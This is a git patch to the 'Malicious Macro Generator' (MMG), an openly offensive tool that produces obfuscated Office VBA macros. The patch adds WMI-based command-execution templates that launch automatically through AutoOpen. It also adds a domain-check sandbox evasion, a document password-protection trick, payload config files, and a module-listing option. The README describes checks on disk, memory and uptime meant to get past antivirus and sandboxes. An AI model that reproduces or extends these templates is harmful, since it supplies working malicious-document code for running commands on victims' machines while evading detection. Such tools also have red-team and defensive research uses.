From 112adc7f47bc62270d5f5882a3a91b80a76e059e Mon Sep 17 00:00:00 2001 From: chamilton Date: Fri, 11 Nov 2016 19:20:01 -0500 Subject: [PATCH] Added WMI support --- README.md | 12 ++--- configs/wmi-cmd-evasion.json | 14 ++++++ configs/wmi-cmd.json | 12 +++++ lib/helper.py | 26 +++++++++- templates/evasions/password.vba | 10 ++++ .../payloads/wmi-cmd-evasion-template.vba | 47 +++++++++++++++++++ templates/payloads/wmi-cmd-template.vba | 45 ++++++++++++++++++ 7 files changed, 158 insertions(+), 8 deletions(-) create mode 100644 configs/wmi-cmd-evasion.json create mode 100644 configs/wmi-cmd.json create mode 100644 templates/evasions/password.vba create mode 100644 templates/payloads/wmi-cmd-evasion-template.vba create mode 100644 templates/payloads/wmi-cmd-template.vba diff --git a/README.md b/README.md index dd8a559..224c37f 100644 --- a/README.md +++ b/README.md @@ -5,20 +5,21 @@ Simple utility design to generate obfuscated macro that also include a AV / Sand #Requirement ``` Python 2.7 -Python 3.4 (Not supported yet) ``` #Usage ``` MMG.Malicious Macro Generator v2.0 - RingZer0 Team -Author: Mr.Un1k0d3r mr.un1k0d3r@gmail.com +Author: Mr.Un1k0d3r -Usage: MMG.py [config] [output] +Usage: MMG.py [config] [output] (optional -list) config Config file that contain generator information output Output filename for the macro + -list List all available payloads and evasion techniques + -python MMG.py configs/genric-cmd.json malicious.vba +python MMG.py configs/generic-cmd.json malicious.vba ``` #Config file @@ -53,7 +54,7 @@ The macro is looking for the total disk space. VMs and test machines use small d The macro is looking for the total memory size. Vms and test machines use less resources. -###### Uptime check +###### Uptime check The macro is looking for the system uptime. Sandboxes will return a short uptime. @@ -67,5 +68,4 @@ The python script will also generate obfuscated code to avoid heuristic detectio Mr.Un1k0d3r RingZer0 Team https://ringzer0team.com -charles.hamilton@mandiant.com diff --git a/configs/wmi-cmd-evasion.json b/configs/wmi-cmd-evasion.json new file mode 100644 index 0000000..fdbe386 --- /dev/null +++ b/configs/wmi-cmd-evasion.json @@ -0,0 +1,14 @@ +{ + "description": "Command exec payload using WMI Win32_Process class\nEvasion technique set to domain check", + "template": "templates/payloads/wmi-cmd-evasion-template.vba", + "varcount": 150, + "encodingoffset": 4, + "chunksize": 200, + "encodedvars": { + "DOMAIN":"RINGZER0" + }, + "vars": [], + "evasion": ["encoder", "domain"], + "payload": "cmd.exe /c whoami" +} + diff --git a/configs/wmi-cmd.json b/configs/wmi-cmd.json new file mode 100644 index 0000000..4912e3c --- /dev/null +++ b/configs/wmi-cmd.json @@ -0,0 +1,12 @@ +{ + "description": "Command exec payload using WMI Win32_Process class\nEvasion technique set to none", + "template": "templates/payloads/wmi-cmd-template.vba", + "varcount": 150, + "encodingoffset": 4, + "chunksize": 200, + "encodedvars": {}, + "vars": [], + "evasion": ["encoder"], + "payload": "cmd.exe /c your payload" +} + diff --git a/lib/helper.py b/lib/helper.py index 220e47d..34423b5 100644 --- a/lib/helper.py +++ b/lib/helper.py @@ -1,5 +1,6 @@ import json import os +import glob class Helper: VERSION = "2.0" @@ -11,12 +12,16 @@ class Helper: self.config = {} def ValidateArgv(self): + if "-list" in self.argv: + self.ListModules() + exit(0) + if len(self.argv) < 3: self.HelpMenu() self.ExitShowError("Missing arguments.") def HelpMenu(self): - print "Usage: %s [config] [output]\n\n\tconfig\tConfig file that contain generator information\n\toutput\tOutput filename for the macro" % self.argv[0] + print "Usage: %s [config] [output] (optional -list)\n\n\tconfig\tConfig file that contain generator information\n\toutput\tOutput filename for the macro\n\t-list\tList all available payloads and evasion techniques" % self.argv[0] def Banner(self): print "MMG.Malicious Macro Generator v%s - RingZer0 Team\nAuthor: Mr.Un1k0d3r mr.un1k0d3r@gmail.com\n" % Helper.VERSION @@ -63,4 +68,21 @@ class Helper: except: self.ExitShowError("Failed to save \"%s\"." % filename) self.PrintSuccess("\"%s\" successfully saved to the disk." % filename) - return self \ No newline at end of file + return self + + def ListModules(self): + path = os.path.dirname(os.path.realpath(__file__)) + payloadPath = path + "/../templates/payloads/" + evasionPath = path + "/../templates/evasions/" + + self.PrintSuccess("List of available payloads") + self.GlobFolder(payloadPath) + + print "\n" + self.PrintSuccess("List of available evasion techniques") + self.GlobFolder(evasionPath) + + def GlobFolder(self, path): + for file in glob.glob(path + "*"): + print "\t" + file.replace(path, "") + \ No newline at end of file diff --git a/templates/evasions/password.vba b/templates/evasions/password.vba new file mode 100644 index 0000000..718d0c2 --- /dev/null +++ b/templates/evasions/password.vba @@ -0,0 +1,10 @@ +[use:password_protect] + +Function password_protect(password_protect1 As String) As String + Dim password_protect2 As String + password_protect2 = "data1" + ActiveDocument.Password = decode(password_protect2) + password_protect2 = "data2" + ActiveDocument.Save + password_protect = password_protect2 +End Function \ No newline at end of file diff --git a/templates/payloads/wmi-cmd-evasion-template.vba b/templates/payloads/wmi-cmd-evasion-template.vba new file mode 100644 index 0000000..854ee95 --- /dev/null +++ b/templates/payloads/wmi-cmd-evasion-template.vba @@ -0,0 +1,47 @@ +[use:payload_wrapper] +[use:exec] +[use:init_wmi] + +Sub AutoOpen() + Dim var1 As String + Dim var2 As Object + Dim var3 As Integer + Dim var4 As String + Dim var5 as String + + var3 = [int1] + var1 = func_evasion_domain() + If (var1 = "bool1") Then + var5 = init_wmi("data1") + Set var2 = GetObject(var5) + var4 = payload_wrapper("data1") + var4 = exec(var2, var4, var3) + End If +End Sub + +Function payload_wrapper(payload_wrapper1 As String) As String + Dim payload_wrapper2 As String + [payload] + payload_wrapper2 = [payload_args] + payload_wrapper2 = decode(payload_wrapper2) + payload_wrapper = payload_wrapper2 +End Function + +Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String + Dim exec4 As String + Dim exec5 As Integer + exec5 = [smallint1] + exec4 = exec2 + If (exec3 > exec5) Then + exec5 = exec3 - exec3 + exec1.Create(exec4) + End If + exec4 = "exec6" + exec = exec4 +End Function + +Function init_wmi(init_wmi1 As String) As String + Dim init_wmi2 As String + init_wmi2 = decode("{[winmgmts:Win32_Process]}") + init_wmi = init_wmi2 +End Function \ No newline at end of file diff --git a/templates/payloads/wmi-cmd-template.vba b/templates/payloads/wmi-cmd-template.vba new file mode 100644 index 0000000..c13906d --- /dev/null +++ b/templates/payloads/wmi-cmd-template.vba @@ -0,0 +1,45 @@ +[use:payload_wrapper] +[use:exec] +[use:init_wmi] + +Sub AutoOpen() + Dim var1 As String + Dim var2 As Object + Dim var3 As Integer + Dim var4 As String + Dim var5 as String + + var3 = [int1] + var1 = "{[Wscript.Shell]}" + var5 = init_wmi("data1") + Set var2 = GetObject(var5) + var4 = payload_wrapper("data1") + var4 = exec(var2, var4, var3) +End Sub + +Function payload_wrapper(payload_wrapper1 As String) As String + Dim payload_wrapper2 As String + [payload] + payload_wrapper2 = [payload_args] + payload_wrapper2 = decode(payload_wrapper2) + payload_wrapper = payload_wrapper2 +End Function + +Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String + Dim exec4 As String + Dim exec5 As Integer + exec5 = [smallint1] + exec4 = exec2 + If (exec3 > exec5) Then + exec5 = exec3 - exec3 + exec1.Create(exec4) + End If + exec4 = "exec6" + exec = exec4 +End Function + +Function init_wmi(init_wmi1 As String) As String + Dim init_wmi2 As String + init_wmi2 = decode("{[winmgmts:Win32_Process]}") + init_wmi = init_wmi2 +End Function \ No newline at end of file